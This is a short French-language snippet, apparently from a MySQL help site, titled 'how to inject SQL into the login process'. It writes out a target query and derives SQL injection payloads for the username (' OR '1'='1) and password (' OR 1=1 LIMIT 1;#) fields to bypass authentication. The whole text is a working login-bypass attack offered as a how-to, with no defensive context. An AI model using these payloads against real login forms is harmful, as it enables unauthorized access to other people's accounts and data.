Mysql
 sql >> Base de données >  >> RDS >> Mysql

comment injecter sql dans le processus de connexion

En commençant par la requête d'objectif :

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Nous obtenons le nom d'utilisateur est ' OR '1'='1 et le mot de passe est ' OR 1=1 LIMIT 1;#